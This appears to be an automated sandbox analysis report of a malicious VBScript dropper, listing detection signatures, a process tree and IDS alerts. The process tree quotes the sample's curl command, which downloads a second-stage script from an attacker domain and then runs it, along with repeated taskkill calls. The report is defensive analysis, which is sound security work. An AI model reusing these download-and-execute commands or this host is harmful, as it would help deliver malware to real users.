Windows
Analysis Report
6724f91d7b548.vbs
Overview
General Information
Detection
Property | Value
---|---
Score | 100
Range | 0 - 100
Whitelisted | false
Confidence | 100%
Signatures
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Excessive usage of taskkill to terminate processes
Overwrites code with function prologues
Potential malicious VBS script found (has network functionality)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Uses ipconfig to lookup or modify the Windows network settings
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Keylogger Generic
Classification
- System is w10x64
- wscript.exe (PID: 1132 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6724f91d7b548.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cmd.exe (PID: 7148 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6724f91d7b54a.vbs https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 2536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- curl.exe (PID: 7064 cmdline: curl -k -o C:\Users\Public\6724f91d7b54a.vbs https://processoeconsulta.online/6724f91d7b3cb/6724f91d7b54a.vbs MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
- cmd.exe (PID: 3608 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6724f91d7b54a.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 884 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6724f91d7b54a.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- CSRPS.exe (PID: 3536 cmdline: "C:\_6724f91d7b3cb\CSRPS.exe" MD5: 74D3F521A38B23CD25ED61E4F8D99F16)
- cmd.exe (PID: 6468 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 6520 cmdline: cmd.exe /c ipconfig /flushdns MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- ipconfig.exe (PID: 4196 cmdline: ipconfig /flushdns MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
- cmd.exe (PID: 3816 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 4044 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 3608 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 884 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- PING.EXE (PID: 6336 cmdline: ping 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
- cmd.exe (PID: 6536 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 500 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 1336 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 5192 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 4368 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 6256 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 1408 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 3796 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 5716 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 2884 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 5412 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 5492 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 280 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 4392 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 3196 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 1524 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- PING.EXE (PID: 2524 cmdline: ping 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
- cmd.exe (PID: 7052 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 2248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 6272 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 4788 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 2832 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 1224 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 6860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 2524 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 4052 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 5664 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 6236 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 4072 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 4072 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 6256 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 4492 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 2120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 5412 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 948 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 5668 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 6424 cmdline: "C:\Windows\System32\cmd.exe" /C C:\_6724f91d7b3cb\MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 1280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- taskkill.exe (PID: 5668 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- taskkill.exe (PID: 4344 cmdline: taskkill /f /im CSRPS.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
- cmd.exe (PID: 4836 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6724f91d7b54a.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 4900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 1268 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\6724f91d7b54a.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
System Summary |
---|
Source: | Author: frack113, Florian Roth: |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: frack113: |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-11-01T16:59:18.415121+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.6 | 49738 | TCP |
2024-11-01T16:59:57.166716+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.6 | 49951 | TCP |
AV Detection |
---|
Source: | ReversingLabs: |
Source: | Binary or memory string: | memstr_db749296-6 |
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Code function: | 13_2_6FCDC2D0 |
Software Vulnerabilities |
---|
Source: | Child: |
Networking |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Dropped file: | Jump to dropped file | ||
Source: | Process created: |
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | Suricata IDS: | ||
Source: | HTTP traffic detected: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | HTTP traffic detected: |